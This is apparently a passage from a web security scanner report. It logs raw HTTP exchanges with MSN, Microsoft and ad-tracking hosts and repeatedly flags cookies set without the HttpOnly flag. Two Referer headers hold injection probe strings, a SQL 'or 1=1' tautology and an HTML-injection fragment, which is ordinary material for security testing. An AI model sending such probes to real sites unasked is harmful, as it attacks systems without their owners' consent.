HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:16:21 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/ Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 02:16:21 GMT Last-Modified: Mon, 31 Jan 2011 02:16:21 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www391 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812 HTTP/1.1 Host: msnbc.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:03 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/ Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 01:22:03 GMT Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www598 Content-Length: 0 Content-Type: text/plain Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ppsecure/post.srf HTTP/1.1 Host: msnia.login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:14:43 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:13:43 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1 X-Frame-Options: deny Content-Length: 11551
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnportalhome/1/H.7-pdv-2/{0} HTTP/1.1 Host: msnportal.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 23:50:09 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/ Location: http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Fri, 28 Jan 2011 23:50:09 GMT Last-Modified: Sun, 30 Jan 2011 23:50:09 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www70 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnportalusenmoney/1/H.7-pdv-2/{0} HTTP/1.1 Host: msnportal.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|2693B20C05013B68-4000010D20126E16|dinydefxxelh|2696E365851591F8-40000180E0024F83[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:16:45 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/ Location: http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 02:16:45 GMT Last-Modified: Mon, 31 Jan 2011 02:16:45 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www52 Content-Length: 0 Content-Type: text/plain Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: music.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 96630 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:50:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: my.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: my.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 23:50:18 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: CO1MPPMYREN04 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2f&lc=1033&id=254014 Set-Cookie: MC1=V=3&GUID=992d4dfe4a3a437b8a4c171fc7cceb14; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ Cache-Control: no-cache Cache-Control: no-store, must-revalidate, max-age=0 Content-Type: text/html; charset=utf-8 Content-Length: 287
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wrep ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05? HTTP/1.1 Host: oasc03049.popsci.com Proxy-Connection: keep-alive Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:16:01 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 13662 Content-Type: application/x-javascript Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60 HTTP/1.1 Host: oascentral.scientificamerican.com Proxy-Connection: keep-alive Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:14:45 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 7042 Content-Type: application/x-javascript Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/
function OAS_RICH(position) { if (position == 'Right1') { document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oasc ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/bing/ff808490.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAABHBwAAm7TtVgJMvgFAgnqZu/TJhg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:50:25 GMT Content-Length: 34741
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/money.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAADfBgAA2AXSEcBOJjoMRri+WPCcHQ!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:23 GMT Content-Length: 26482
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/qwlinfo.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAADHCAAA266j5xBE5bvLgdGilVUO5Q!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:27 GMT Content-Length: 28036
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/qwlnotyours.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAAVBwAAg+A0N79NlMCN1BebkgAdCA!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:26 GMT Content-Length: 24860
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/thebasics.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAAKBwAA5krr+oNHqj3Y35ynMPVKcA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:50:26 GMT Content-Length: 21044
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /A06546/b3/0/3/1003161/543149170.js HTTP/1.1 Host: pix04.revsci.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d69b449&0&&4d43b3c1&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 02:17:45 GMT; Path=/ X-Proc-ms: 11 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Content-Length: 733 Date: Sun, 30 Jan 2011 02:17:45 GMT Connection: close
/* Vermont-12.4.0-1012 */ rsinetsegs=['A06546_10827','H05525_10833','A06546_50376']; var rsiExp=new Date((new Date()).getTime()+2419200000); var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.*(\.[ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
